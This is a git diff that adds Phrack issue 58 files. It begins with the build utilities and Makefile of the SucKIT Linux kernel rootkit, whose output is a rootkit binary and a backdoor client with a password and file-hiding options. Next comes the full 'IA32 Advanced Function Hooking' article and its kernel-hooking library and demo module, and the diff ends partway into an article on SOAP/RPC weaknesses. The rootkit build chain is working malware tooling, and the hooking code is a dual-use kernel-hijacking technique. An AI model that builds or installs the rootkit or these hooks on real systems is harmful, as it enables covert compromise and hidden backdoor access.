+        if (!rbuf) exit(1);
+        read(core, rbuf, obj.size - obj.bss_size);
+        close(core);
+        core = open(argv[2], O_CREAT | O_RDWR | O_TRUNC, 0664);
+        if (core < 0) return 1;
+        write(core, rbuf, obj.size - obj.bss_size);
+        printf("Ok, %d bytes\n", obj.size - obj.bss_size);
+        printf("Ripping relocs..."); fflush(stdout);
+        sprintf(buf, "objdump -r %s", argv[1]);
+        dump = popen(buf, "r");
+        while (fgets(buf, sizeof(buf), dump)) {
+                unsigned        off;
+                char            type[512];
+                char            name[512];
+                if (sscanf(buf, "%x %s %s", &off, type, name) == 3)
+                if (!strcmp(type, "R_386_32")) {
+                        if (strcmp(name, ".text") != 0) {
+                                printf("FUCK: Bad reloc %x\t%s\%s\n",
+                                       off, type, name);
+                                exit(1);
+                        }
+                        write(core, &off, sizeof(off));
+                        rcount++;
+                }
+        }
+        off = 0xFFFFFFFF;
+        write(core, &off, sizeof(off));
+        close(core);
+        printf("OK, %d relocs\n", rcount);
+        return 0;
+}
+<--> ./utils/rip.c
+<++> ./utils/Makefile
+utils:  parser bin2hex rip
+clean:
+	rm -f parser bin2hex rip core
+<--> ./utils/Makefile
+<++> ./utils/bin2hex.c
+/* $Id: bin2hex.c, bin2hex translator */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+
+#define PER_LINE        6
+#define BUF_SIZE        (64*1024)
+
+int     main(int argc, char *argv[])
+{
+        int     c;
+        int     size = 0;
+        int     i;
+        char    buf[BUF_SIZE];
+        uint    *lp = (uint *) buf;
+        int     col;
+
+        bzero(buf, BUF_SIZE);
+
+        if (argc != 2) {
+                printf("Use: %s var_name\n", argv[0]);
+                exit(1);
+        }
+        printf("/* generated by bin2hex.c */\n"
+                "unsigned\tlong\t%s[] = {\n\t", argv[1]);
+        while ((c = fgetc(stdin)) != EOF) {
+                buf[size++] = c;
+        }
+        size = (size + 3) / 4;
+        for (i = 0, col = 1; i < size; i++, col++) {
+                printf("0x%08x", lp[i]);
+                if (i < (size - 1)) printf(",");
+                if (col >= PER_LINE) {
+                        printf("\n\t");
+                        col = 0;
+                }
+        }
+        printf("};\n/* %d bytes total */\n", size * 4);
+        return 0;
+}
+<--> ./utils/bin2hex.c
+<++> ./Makefile
+# An makefile, it may be buggy, cause i'm not so familiar with GNU make
+
+#an escape character
+ECHAR           = 0x0b
+#some random number to identify our raw packets, better if you change it
+RAWID           = 0x8C1C941F
+#current version
+VERSION         = v1.1c
+#signature for communication between user <> kernel spaces
+OURSIGN         = 0x14431337
+#rc file in home directory
+RCFILE          = .rc
+
+#dirs
+INCLUDE         = include
+SRC             = src
+UTILS           = utils
+CLIENT          = client
+TMP             = tmp
+
+#CC defs
+CC              = gcc
+CFLAGS          = -s -Wall -O6 -fno-inline-functions -fno-unroll-all-loops\
+                  -I$(INCLUDE) -I$(TMP) -DSUCKIT_VERSION=\"$(VERSION)\"\
+                  -DRAWID=$(RAWID) -DECHAR=$(ECHAR) -DOURSIGN=$(OURSIGN)\
+                  -DRCFILE=\"$(RCFILE)\"
+
+
+
+all:	sk cli
+	@( ./sk 1 )
+	@echo "OK, compilation seems to be done, \
+              i'm HIGLY suggest you to do"
+	@echo "./sk c <file_hide_suffix> <password> <home_directory>"
+	@echo "before installing it somewhere!"
+	@echo "Enjoy!"
+
+help:
+	@echo "Targets:"
+	@echo "  make clean  - clean"
+	@echo "  make cli    - create localhost bd's client"
+	@echo "  make sk     - create suckit"
+	@echo "  make help   - diz help"
+
+cli:
+	$(CC) $(CFLAGS) $(CLIENT)/client.c -o cli
+
+binutils:
+	@( cd $(UTILS); make CC=gcc CFLAGS="$(CFLAGS)")
+
+$(TMP):
+	@( mkdir $(TMP) )
+$(TMP)/core.s:  $(SRC)/core.c tmp
+	$(CC) $(CFLAGS) -S $(SRC)/core.c -o $(TMP)/core.s
+$(TMP)/core.o:  $(TMP)/core.s binutils
+	$(UTILS)/parser < $(TMP)/core.s > $(TMP)/c0re.s
+	$(CC) $(CFLAGS) -c $(TMP)/c0re.s -o $(TMP)/core.o
+$(TMP)/cor:     $(TMP)/core.o binutils
+	$(UTILS)/rip $(TMP)/core.o $(TMP)/cor
+$(TMP)/core.h: $(TMP) $(TMP)/cor binutils
+	$(UTILS)/bin2hex punk < $(TMP)/cor > $(TMP)/core.h
+
+sk:	binutils $(TMP)/core.h
+	$(CC) $(CFLAGS) -w -nostdlib $(SRC)/sk.c -o sk
+
+clean:
+	rm -f $(TMP)/* core
+	rm -rf $(TMP)
+	@( cd $(UTILS); make clean )
+	@( cd $(CLIENT); make clean )
+<--> ./Makefile
+
+
diff --git a/phrack58/8.txt b/phrack58/8.txt
new file mode 100644
index 0000000..5aca694
--- /dev/null
+++ b/phrack58/8.txt
@@ -0,0 +1,867 @@
+                
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x08 of 0x0e
+
+|=-----------------=[ IA32 ADVANCED FUNCTION HOOKING ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------=[ mayhem  <mayhem@hert.org> ]=---------------------=|
+|=-----------------------=[ December 08th 2001 ]=------------------------=|
+
+ 
+--[ Contents
+
+ 1 - Introduction
+   1.1 - History
+   1.2 - New requirements
+
+ 2 - Hooking basics
+   2.1 - Usual techniques
+   2.2 - Things not to forget
+
+ 3 - The code explained 
+
+ 4 - Using the library
+   4.1 - The API
+   4.2 - Kernel symbol resolution
+   4.3 - The hook_t object
+
+ 5 - Testing the code 
+   5.1 - Loading the module
+   5.2 - Playing around a bit
+   5.3 - The code
+
+ 6 - References
+   
+
+
+
+--[ 1 - Introduction
+
+  
+  Abusing, logging , patching , or even debugging : obvious reasons to think 
+  that hooking matters . We will try to understand how it works . The 
+  demonstration context is the Linux kernel environment . The articles ends
+  with a general purpose hooking library the linux kernel 2.4 serie,
+  developped on 2.4.5 and running on IA32, it's called LKH, the Linux Kernel
+  Hooker.
+
+
+----[ 1.1 - History
+
+  One of the reference on the  function hijacking subject subject has
+  been released in November 1999 and is written by Silvio Cesare 
+  (hi dude ;-). This implementation was pretty straightforward since
+  the hooking was consisting in modifying the first bytes of the 
+  function jumping to another code , in order to filter access on the
+  acct_process function of the kernel, keeping specific processes from 
+  beeing accounted .
+
+
+----[ 1.2 - New requirements
+
+
+ Some work has been done since that time :
+
+ - Pragmatic use of redirection often (always ?) need to access the
+   original parameters, whatever their number and their size (for example
+   if we want to modify and forward IP packets) .  
+
+ - We may need to disable the hook on demand, which is perfect for runtime 
+   kernel configuration . We may want to call the original functions
+   (discrete hooking, used by monitoring programs) or not (aggressive hooking,
+   used by security patches to manage ACL  - Access Control Lists - ) on kernel 
+   ojects . 
+
+ - In some cases, we may also want to destroy the hook just after the first 
+   call, for example to do statistics (we can hook one time every seconds or
+   every minuts) .
+ 
+
+
+--[ 2 - Hooking basics
+
+
+----[ 2.1 Usual techniques 
+
+
+ Of course, the core hooking code must be done in assembly language, but the 
+ hooking wrapping code is done in C . The LKH high level interface is described
+ in the API section . May we first understand some hooking basics .
+
+ This is basicaly what is hooking :
+
+ - Modify the begin of a function code to points to another code 
+   (called the 'hooking code') . This is a very old and efficient way
+   to do what we want . The other way to do this is to patch every calls
+   in the code segment referencing the function . This second method
+   has some advantages (it's very stealth) but the implementation is a bit
+   complex (memory area blocks parsing, then code scanning) and not very
+   fast .
+
+ - Modify in runtime the function return address to takes control when the
+   hooked function execution is over . 
+
+ - The hook code must have two different parts, the first one must be 
+   executed before the function (prepare the stack for accessing para-
+   meters, launch callbacks, restore the old function code) , the second 
+   one must be executed after (reset the hook again if needed)
+
+ - Default parameters (defining the hook behaviour) must be set during 
+   the hook creation (before modifying the function code) . Function
+   dependant parameters must be fixed now .
+
+ - Add callbacks . Each callback can access and even modify the original
+   function parameters .
+
+ - Enable, disable, change parameters, add or remove callbacks when we want .
+
+
+
+
+----[ 2.2 - Things not to forget
+
+
+  -> Functions without frame pointer:
+
+  A important feature is the capability to hook functions compiled with the
+  -fomit-frame-pointer gcc option . This feature requires the hooking code to
+  be %ebp free , that's why we will only %esp is used for stack operations.
+  We also have to update some part (Some bytes here and there) to fix %ebp
+  relative offsets in the hook code . Look at khook_create() in lkh.c for more
+  details on that subject .
+
+  The hook code also has to be position independant . That's why so many
+  offsets in the hookcode are fixed in runtime (Since we are in the kernel,
+  offsets have to be fixed during the hook creation, but very similar 
+  techniques can be used for function hooking in *runtime* processes).
+
+
+  -> Recursion 
+
+  We must be able to call the original function from a callback, so the
+  original code has t be restored before the execution of any callback .
+
+  
+ -> Return values
+ 
+  We must returns the correct value in %eax, wether we have callbacks or no,
+  wether the original function is called or no . In the demonstration, the
+  return value of the last executed callback is returned if the original
+  function is not called . If no callbacks and no original function is called,
+  the return value is beyond control. 
+ 
+
+   -> POST callbacks
+
+  You cannot access function parameters if you execute callbacks after the
+  original function . That's why it's a bad idea . However, here is the
+  technique to do it : 
+  
+  - Set the hook as aggressive
+ 
+  - Call the PRE callbacks .
+
+  - Call the original function from a callback with its own parameters .
+
+  - Call the POST callbacks .
+ 
+
+
+
+--[ 3 - The code explained .
+
+
+    First we install the hook.
+ 
+    A - Overwrite the first 7 bytes of the hijacked routine
+        with an indirect jump pointing to the hook code area . 
+
+        The offset put in %eax is the obsolute address of the hook
+        code, so each time we'll call the hijack_me() function,
+        the hook code will takes control . 
+
+        Before hijack:
+
+        0x80485ec <hijack_me>:          mov    0x4(%esp,1),%eax
+        0x80485f0 <hijack_me+4>:        push   %eax
+        0x80485f1 <hijack_me+5>:        push   $0x8048e00
+        0x80485f6 <hijack_me+10>:       call   0x80484f0 <printf>
+        0x80485fb <hijack_me+15>:       add    $0x8,%esp
+
+
+        After the hijack:
+
+        0x80485ec <hijack_me>:          mov    $0x804a323,%eax
+        0x80485f1 <hijack_me+5>:        jmp    *%eax
+        0x80485f3 <hijack_me+7>:        movl   (%eax,%ecx,1),%es
+        0x80485f6 <hijack_me+10>:       call   0x80484f0 <printf>
+        0x80485fb <hijack_me+15>:       add    $0x8,%esp
+        
+        The 3 instructions displayed after the jmp dont means anything , 
+        since gdb is fooled by our hook .
+    
+
+    B - Reset the original bytes of the hooked function, we need that if
+        we want to call the original function without breaking things .
+
+           pusha
+           movl        $0x00, %esi                     (1)
+           movl        $0x00, %edi                     (2)
+           push        %ds
+           pop         %es
+           cld
+           xor         %ecx, %ecx
+           movb        $0x07, %cl
+           rep movsl                   
+
+
+        The two NULL offsets have actually been modified during the hook
+        creation (since their values depends on the hooked function offset,
+        we have to patch the hook code in runtime) . (1) is fixed with
+        the offset of the buffer containing the first 7 saved bytes of the 
+        original function . (2) is fixed with the original function address.
+        If you are familiar with the x86 assembly langage, you should know
+        that these instructions will copy %ecx bytes from %ds:%esi to
+        %es:%edi . Refers to [2] for the INTEL instructions specifications.
+
+        
+    C - Initialise the stack to allow parameters read/write access and
+        launch our callbacks . We move the first original parameter 
+        address in %eax then we push it .
+
+           leal        8(%esp), %eax
+           push        %eax
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop
+           nop; nop; nop; nop; nop             
+
+
+        Note that empty slots are full of NOP instruction (opcode 0x90) . 
+        This mean no operation . When a slot is filled (using khook_add_entry
+        function) , 5 bytes are used :
+
+        - The call opcode (opcode 0xE8) 
+
+        - The calback offset (4 bytes relative address)
+
+	We choose to set a maximum of 8 callbacks . Each of the inserted
+	callbacks are called with one parameter (the %eax pushed value contains
+	the address of the original function parameters, reposing the stack).
+                  
+
+
+
+    D - Reset the stack .
+
+           add $0x04, %esp             
+
+        We now remove the original function's parameter address 
+        pushed in (C) . That way, %esp is reset to its old value (the
+        one before entering the step C). At this moment, the stack
+        does not contains the original function's stack frame since it 
+        was overwritten on step (A) .
+
+
+    E - Modify the return address of the original function on the stack .
+        On INTEL processors, functions return addresses are saved on the stack, 
+        which is not a very good idea for security reasons ;-) . This 
+        modification makes us return where we want (to the hook-code)
+        after the original function execution. Then we call the original
+        function. On return, the hook code regains control . Let's look at
+	that carefully :
+
+
+        -> First we get our actual %eip and save it in %esi (the end
+           labels points to some code you can easily identify on
+           step E5). This trick is always used in position independant 
+           code.
+
+        1.  jmp         end
+            begin:
+            pop         %esi                    
+
+
+        -> Then we retreive the old return address reposing 
+           at 4(%esp) and save it in %eax .
+
+        2.  movl        4(%esp), %eax
+
+        -> We use that saved return address as an 4 bytes offset
+           at the end of the hook code (see the NULL pointer in 
+           step H), so we could return to the right place at the
+           end of the hooking process .
+
+        3.  movl        %eax, 20(%esi)          
+
+
+        -> We modify the return address of the original function
+           so we could return just after the 'call begin' instruction .
+
+        4.  movl        %esi, 4(%esp)
+            movl        $0x00, %eax
+
+
+        -> We call the original function . The 'end' label is used 
+           in step 1, and the 'begin' label points the code just
+           after the "jmp end" (still in step 1) .
+           The original function will return just after the 'call begin'
+           instruction since we changed its return address .
+
+
+        5.  jmp         *%eax
+            end:
+            call        begin
+
+
+     F - Back to the hooking code . We set again the 7 evil bytes in the 
+         original function 's code . These bytes were reset to their original
+	 values before calling the function, so we need to hook the function
+         again (like in step A) .
+ 
+         This step is noped (replaced by NOP instructions) if the hook is
+         single-shot (not permanent), so the 7 bytes of our evil indirect 
+         jump (step A) are not copied again . This step is very near from
+         step (B) since it use the same copy mechanism (using rep movs* 
+         instructions), so refers tothis step for explainations . NULL
+         offsets in the code must be fixed during the hook creation :
+         
+         - The first one (the source buffer) is replaced by the evil bytes 
+           buffer .
+          
+         - The second one (the destination buffer) is replaced by the original
+         function entry point address .
+
+
+            movl        $0x00, %esi
+            movl        $0x00, %edi
+            push        %ds
+            pop         %es
+            cld
+            xor         %ecx, %ecx
+            movb        $0x07, %cl
+            rep movsb                   
+
+
+    G - Use the original return address (saved on step E2) and get
+        back to the original calling function . The NULL offset you
+        can see (*) must be fixed in step E2 with the original function
+        return address . The %ecx value is then pushed on the stack so the
+        next ret instruction will use it like if it was a saved %eip
+        register on the stack . This returns to the (correct) original
+        place .
+ 
+            movl        $0x00, %ecx	*
+            pushl       %ecx
+            ret
+
+
+
+--[ 4 - Using the library
+
+
+----[ 4.1 - The API
+
+
+ The LKH API is pretty easy to use :
+  
+ hook_t        *khook_create(int addr, int mask);
+
+        Create a hook on the address 'addr'. Give also the default type
+        (HOOK_PERMANENT or HOOK_SINGLESHOT) , the default state 
+        (HOOK_ENABLED or HOOK_DISABLED) and the default mode (HOOK_AGGRESSIVE
+        or HOOK_DISCRETE) . The type, state and mode are OR'd in the
+        'mask' parameter .
+
+
+
+ void khook_destroy(hook_t *h);
+
+        Disable, destroy, and free the hook ressources .
+
+
+ int khook_add_entry(hook_t *h, char *routine, int range);
+
+        Add a callback to the hook, at the 'range' rank . Return -1 if the
+        given rank is invalid . Otherwise, return 0 .
+
+
+ int khook_remove_entry(hook_t *h, int range);
+
+        Remove the callback put in slot 'range', return -1 if the given rank
+        is invalid . Otherwise return 0 .
+
+
+ void khook_purge(hook_t *h);
+
+        Remove all callbacks on this hook .
+
+
+ int khook_set_type(hook_t *h, char type);
+
+        Change the type for the hook 'h' . The type can be HOOK_PERMANENT
+        (the hookcode is executed each time the hooked function is called) or
+        HOOK_SINGLESHOT (the hookcode is executed only for 1 hijack, then the
+        hook is cleanly removed .
+
+
+ int khook_set_state(hook_t *h, char state);
+
+        Change the state for the hook 'h' . The state can be HOOK_ENABLED
+        (the hook is enabled) or HOOK_DISABLED (the hook is disabled) .
+
+
+ int khook_set_mode(hook_t *h, char mode);
+
+        Change the mode for the hook 'h' . The mode can be HOOK_AGGRESSIVE
+        (the hook does not call the hijacked function) or HOOK_DISCRETE
+        (the hook calls the hijacked function after having executed the
+        callback routines) . Some part of the hook code is nop'ed
+        (overwritten by no operation instructions) if the hook is aggressive
+        (step E and step H) .
+
+
+ int khook_set_attr(hook_t *h, int mask);
+
+        Change the mode, state, and/or type using a unique function call.
+        The function returns 0 in case of success or -1 if the specified
+        mask contains incompatible options . 
+
+
+ Note that you can add or remove entries whenever you want, whatever the 
+ state , type and mode of the used hook .
+ 
+
+
+----[ 4.2 - Kernel symbol resolution
+
+ A symbol resolution function has been added to LKH, allowing you to access
+ exported functions values . 
+
+ int ksym_lookup(char *name);
+
+ Note that it returns NULL if the symbol remains unresolved . This lookup
+ can resolve symbols contained in the __ksymtab section of the kernel, an
+ exhaustive list of these symbols is printed when executing 'ksyms -a' :
+
+ bash-2.03# ksyms -a | wc -l
+   1136
+ bash-2.03# wc -l /boot/System.map 
+  14647 /boot/System.map
+ bash-2.03# elfsh -f /usr/src/linux/vmlinux -s   # displaying sections
+
+ [SECTION HEADER TABLE]
+
+ (nil)      ---             foffset:    (nil)        0 bytes [*Unknown*] 
+ (...)
+ 0xc024d9e0 a-- __ex_table  foffset: 0x14e9e0     5520 bytes [Program data] 
+ 0xc024ef70 a-- __ksymtab   foffset: 0x14ff70     9008 bytes [Program data] 
+ 0xc02512a0 aw- .data       foffset: 0x1522a0    99616 bytes [Program data] 
+ (...)
+ (nil)      --- .shstrtab   foffset: 0x1ad260      216 bytes [String table] 
+ (nil)      --- .symtab     foffset: 0x1ad680   245440 bytes [Symbol table] 
+ (nil)      --- .strtab     foffset: 0x1e9540   263805 bytes [String table] 
+
+ [END]
+ 
+
+ As a matter of fact, the memory mapped section __ksymtab does not contains
+ every kernel symbols we would like to hijack.
+ In the other hand, the non-mapped section .symtab is definitely bigger
+ (245440 bytes vs 9008 bytes). When using 'ksyms', the __NR_query_module
+ syscall (or __NR_get_kernel_syms for older kernels) is used internaly, this
+ syscall can only access the __ksymtab section since the complete kernel
+ symbol table contained in __ksymtab is not loaded in memory. The solution
+ to access to whole symbol table is to pick up offsets in our System.map
+ file (create it using `nm -a vmlinux > System.map`) .
+
+ bash-2.03# ksyms -a | grep sys_fork
+ bash-2.03# grep sys_fork /boot/System.map 
+ c0105898 T sys_fork
+ bash-2.03# 
+ 
+
+ #define        SYS_FORK        0xc0105898
+
+  if ((s = khook_create((int) SYS_FORK, HOOK_PERMANENT, HOOK_ENABLED)) == NULL)
+    KFATAL("init_module: Cant set hook on function *sys_fork* ! \n", -1);
+  khook_add_entry(s, (int) fork_callback, 0);
+
+ #undef SYS_FORK
+
+
+ For systems not having System.map or uncompressed kernel image (vmlinux),
+ it is acceptable to uncompress the vmlinuz file (take care, its not a
+ standard gzip format!
+ [3] contains very useful information about this) and create manually
+ a new System.map file .
+
+ Another way to go concerning kernel non-exported symbols resolution could
+ be a statistic based lookup : Analysing references in the kernel
+ hexadecimal code could allow us to predict the symbol values (fetching
+ call or jmp instructions), the difficulty of this tool would be the
+ portability, since the kernel code changes from a version to another. 
+ 
+ Dont forgett t change SYS_FORK to your own sys_fork offset value.
+
+
+----[ 4.3 - LKH Internals: the hook_t object
+
+ Let's look at the hook_t structure (the hook entity in memory) :
+
+typedef struct        s_hook
+{
+  int                 addr;                        
+  int                 offset;                        
+  char                saved_bytes[7];                
+  char                voodoo_bytes[7];        
+  char                hook[HOOK_SIZE];        
+  char                cache1[CACHE1_SIZE];    
+  char                cache2[CACHE2_SIZE];        
+}		      hook_t;
+
+ 
+
+ h->addr            The address of the original function, used to
+		    enable or disable the hook .
+
+ h->offset          This field contains the offset from h->addr where to
+		    begin overwrite to set the hijack . Its value is 3 or
+                    0 , it depends if the function has a stack frame
+                    or not . 
+
+ h->original_bytes  The seven overwritten bytes of the original 
+                    function . 
+
+ h->voodoo_bytes    The seven bytes we need to put at the beginning of the
+                    function to redirect it (contains the indirect jump code
+                    seen in step A on paragraph 3) .
+
+ h->hook            The opcodes buffer contaning the hooking code, 
+                    where we insert callback reference using 
+                    khook_add_entry() .
+
+ 
+ The cache1 and cache2 buffers are used to backup some hook code when we
+ set the mode HOOK_AGGRESSIVE (since we have to nop the original function
+ call, saving this code is necessary , for eventually reset the hook as
+ discrete after)
+
+
+
+ Each time you create a hook, an instance of hook_t is declared and
+ allocated . You have to create one hook per function you want to
+ hijack .
+
+
+
+
+----[ 5 - Testing the code
+
+
+ Please check http://www.devhell.org/~mayhem/ for fresh code first. The
+ package (version 1.1) is given at the end of the article) .
+
+ Just do #include "lkh.c" and play ! In this example module using LKH, 
+ we wants to hook :
+
+ - the hijack_me() function, here you can check the good parameters passing
+   and their well done modification throught the callbacks .
+
+ - the schedule() function, SINGLESHOT hijack .
+
+ - the sys_fork() function, PERMANENT hijack .
+
+
+------[ 5.1 - Loading the module
+
+bash-2.03# make load
+insmod lkh.o
+Testing a permanent, aggressive, enabled hook with 3 callbacks:
+A in hijack_one  = 0 -OK- 
+B in hijack_one  = 1 -OK- 
+A in hijack_zero = 1 -OK- 
+B in hijack_zero = 2 -OK- 
+A in hijack_two  = 2 -OK- 
+B in hijack_two  = 3 -OK- 
+--------------------
+Testing a disabled hook:
+A in HIJACKME!!! = 10 -OK-
+B in HIJACKME!!! = 20 -OK-
+--------------------
+Calling hijack_me after the hook destruction
+A in HIJACKME!!! = 1  -OK-
+B in HIJACKME!!! = 2  -OK-
+SCHEDULING!
+
+------[ 5.2 - Playing around a bit
+
+bash-2.05# ls
+FORKING!
+Makefile  doc  example.c  lkh.c  lkh.h  lkh.o  user  user.c  user.h  user.o
+bash-2.05# pwd
+/usr/src/coding/LKH
+
+
+(Did not printed FORKING! since pwd is a shell builtin command :)
+
+
+bash-2.05# make unload
+FORKING!
+rmmod lkh;
+LKH unloaded - sponsorized by the /dev/hell crew!
+bash-2.05# ls
+Makefile  doc  example.c  lkh.c  lkh.h  lkh.o  user  user.c  user.h  user.o
+bash-2.05# 
+
+
+You can see "FORKING!" each time the sys_fork() kernel function is called
+(the hook is permanent) and "SCHEDULING!" when the schedule() kernel function
+is called for the first time (since this hook is SINGLESHOT, the schedule()
+function is hijacked only one time, then the hook is removed) . 
+
+Here is the commented code for this demo :
+
+
+------[ 5.3 - The code
+
+/*
+** LKH demonstration code, developped and tested on Linux x86 2.4.5
+**
+** The Library code is attached .
+** Please check http://www.devhell.org/~mayhem/ for updates .
+**
+** This tarball includes a userland code (runnable from GDB), the LKH
+** kernel module and its include file, and this file (lkm-example.c)
+** 
+** Suggestions {and,or} bug reports are welcomed ! LKH 1.2 already
+** in development .
+**
+** Special thanks to b1nf for quality control ;)
+** Shoutout to kraken, keep the good work on psh man !
+**
+** Thanks to csp0t (one work to describe you : *elite*)
+** and cma4 (EPITECH powa, favorite win32 kernel hax0r)
+**
+** BigKaas to the devhell crew (r1x and nitrogen fux0r)
+** Lightman, Gab and Xfred from chx-labs (stop smoking you junkies ;)
+**
+** Thanks to the phrackstaff and particulary skyper for his 
+** great support . Le Havre en force ! Case mais oui je t'aime ;)
+*/
+#include "lkh.c"
+
+
+int        hijack_me(int a, int b);	/* hooked function */
+int        hijack_zero(void *ptr);	/* first callback */
+int        hijack_one(void *ptr);	/* second callback */
+int        hijack_two(void *ptr);	/* third callback */
+void       hijack_fork(void *ptr);	/* sys_fork callback */
+void       hijack_schedule(void *ptr);	/* schedule callback */
+
+static  hook_t        *h = NULL;
+static  hook_t        *i = NULL;
+static  hook_t        *j = NULL;
+
+
+int
+init_module()
+{
+  int                ret;
+
+  printk(KERN_ALERT "Change the SYS_FORK value then remove the return \n");
+  return (-1);
+
+  /*
+  ** Create the hooks
+  */
+
+#define        SYS_FORK 0xc010584c
+
+  j = khook_create(SYS_FORK
+                 , HOOK_PERMANENT
+                 | HOOK_ENABLED
+                 | HOOK_DISCRETE);
+
+#undef        SYS_FORK
+
+  h = khook_create(ksym_lookup("hijack_me")
+                 , HOOK_PERMANENT
+                 | HOOK_ENABLED
+                 | HOOK_AGGRESSIVE);
+
+  i = khook_create(ksym_lookup("schedule")
+                 , HOOK_SINGLESHOT
+                 | HOOK_ENABLED 
+                 | HOOK_DISCRETE);
+
+
+  /*
+  ** Yet another check
+  */
+  if (!h || !i || !j)
+    {
+      printk(KERN_ALERT "Cannot hook kernel functions \n");
+      return (-1);
+    }
+
+
+  /*
+  ** Adding some callbacks for the sys_fork and schedule functions
+  */
+  khook_add_entry(i, (int) hijack_schedule, 0);
+  khook_add_entry(j, (int) hijack_fork, 0);
+
+
+
+  /*
+  ** Testing the hijack_me() hook .
+  */
+  printk(KERN_ALERT "LKH: perm, aggressive, enabled hook, 3 callbacks:\n");
+  khook_add_entry(h, (int) hijack_zero, 1);
+  khook_add_entry(h, (int) hijack_one, 0);
+  khook_add_entry(h, (int) hijack_two, 2);
+  ret = hijack_me(0, 1);
+
+  printk(KERN_ALERT "--------------------\n");
+  printk(KERN_ALERT "Testing a disabled hook :\n");
+  khook_set_state(h, HOOK_DISABLED);
+  ret = hijack_me(10, 20);
+
+  khook_destroy(h);
+  printk(KERN_ALERT "------------------\n");
+  printk(KERN_ALERT "Calling hijack_me after the hook destruction\n");
+  hijack_me(1, 2);
+
+  return (0);
+}
+
+
+
+void
+cleanup_module()
+{
+  khook_destroy(i);
+  khook_destroy(j);
+  printk(KERN_ALERT "LKH unloaded - sponsorized by the /dev/hell crew!\n");
+}
+
+
+
+
+/*
+** Function to hijack
+*/
+int
+hijack_me(int a, int b)
+{
+  printk(KERN_ALERT "A in HIJACKME!!! = %u \t -OK- \n", a);
+  printk(KERN_ALERT "B in HIJACKME!!! = %u \t -OK- \n", b);
+  return (42);
+}
+
+
+
+/*
+** First callback for hijack_me()
+*/
+int
+hijack_zero(void *ptr)
+{
+  int        *a;
+  int        *b;
+
+  a = ptr;
+  b = a + 1;
+  printk(KERN_ALERT "A in hijack_zero = %u \t -OK- \n", *a);
+  printk(KERN_ALERT "B in hijack_zero = %u \t -OK- \n", *b);
+  (*b)++;
+  (*a)++;
+  return (0);
+}
+
+
+
+/*
+** Second callback for hijack_me()
+*/
+int
+hijack_one(void *ptr)
+{
+  int        *a;
+  int        *b;
+  
+  a = ptr;
+  b = a + 1;
+  printk(KERN_ALERT "A in hijack_one  = %u \t -OK- \n", *a);
+  printk(KERN_ALERT "B in hijack_one  = %u \t -OK- \n", *b);
+  (*a)++;
+  (*b)++;
+  return (1);
+}
+
+
+
+/*
+** Third callback for hijack_me()
+*/
+int
+hijack_two(void *ptr)
+{
+  int        *a;
+  int        *b;
+
+  a = ptr;
+  b = a + 1;
+  printk(KERN_ALERT "A in hijack_two  = %u \t -OK- \n", *a);
+  printk(KERN_ALERT "B in hijack_two  = %u \t -OK- \n", *b);
+  (*a)++;
+  (*b)++;
+  return (2);
+}
+
+
+
+
+/*
+** Callback for schedule() (kernel exported symbol)
+*/
+void        hijack_schedule(void *ptr)
+{
+  printk(KERN_ALERT "SCHEDULING! \n");
+}
+
+
+
+/*
+** Callbacks for sys_fork() (kernel non exported symbol)
+*/
+void
+hijack_fork(void *ptr)
+{
+  printk(KERN_ALERT "FORKING! \n");
+}
+
+
+
+
+--[ 6 - References
+
+ [1] Kernel function hijacking
+     http://www.big.net.au/~silvio/
+ [2] INTEL Developers manual
+     http://developers.intel.com/design/pentiu m4/manuals/
+ [3] Linux Kernel Internals
+     http://www.linuxdoc.org/guides.html
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
+
+
diff --git a/phrack58/9.txt b/phrack58/9.txt
new file mode 100644
index 0000000..4101304
--- /dev/null
+++ b/phrack58/9.txt
@@ -0,0 +1,471 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x09 of 0x0e
+
+|=-------------=[ RPC without borders (surfing USA ...) ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ stealth <stealth@segfault.net>  ]=------------------=|
+
+
+--[ Introduction
+
+  In this article I will explain weaknesses as they already exist in
+today's remote object access technologies (focusing on the new 
+SOAP -- Simple Object Access Protocol) or may show up in future. I will
+give a small walk-around on things already available and will explain why
+they are used and why it makes sense to use it. Since the topic is *that*
+large, I can only give you basic ideas of how these things work in general;
+but I focus on a SOAP implementation in Perl later, where I explain in
+depth how things break, and will try to 'port' the ideas then. References
+are given in the end so you may try to figure out remote object access
+yourself -- its a damn interesting thing. :-)
+
+
+--[ 1. The new RPCs
+
+  RPC as you know it has been used in a lot of services for decades such
+as in NIS or NFS. However these have never been available to multi-tier
+applications and web-applications in paricular (or at least RPC wasn't
+really made for it).
+
+  Since a few years, 'RPC over XML', so called "XML-RPC" has been defined
+which should enable developers (web-developers in paricular) to _easily_
+use the RPC capability which has been available to system-programmers for
+years. Application-developers today use CORBA (Common Object Request Broker
+Architecture), which (in short) adds the ability of accessing objects
+remotely with RPC. Since the blinking OO world began, developers felt they
+need to access objects remotely and they are quite happy with CORBA. It
+allows nice things such as
+
+     today = TimeServer_ptr->date();
+
+that is it looks like you are accessing a local object, but indeed it is
+located on some other box. The underlying so called "Middleware" libraries
+translate this call into sending data in a special format to the server
+which invokes the request on an object the server registered for remote
+usage.
+
+  The reason for this is that programs have grown so much in recent years
+that programmers want to have easy ways to access ressources remotely,
+without the pain of platform-specifics such as byte-ordering, different
+socket-semantics etc. etc.. There also exist a lot of tools and
+pre-compilers which do a lot of work for the programmer already (such as
+translating an interface-description into valid C++ code).
+
+  Everything is fine except it is a _bit_ complicated and our
+web-application-developers probably do not use it at all, so the need for
+an easy to access and straight to implement CORBA-replacement (read
+'replacement' as 'we are happy with it, but isn't there an easier way?')
+seemed to be necessary. 
+
+  XML-RPC was there already, so why not building a remote object access
+facility on top of it? SOAP was born. It allows you to call methods on
+objects remotely, similar to the example above.  Somewhat like OO XML-RPC.
+
+  Unlike the 'normal' RPC where program and version-numbers were required
+to specify which function should be called, XML-RPC allows you to send the
+full functionname across the socket enveloped into a XML document. You
+usually need to register the objects (with the corresponding methods) which
+may be accessed from the outside; at least when I wrote a distributed
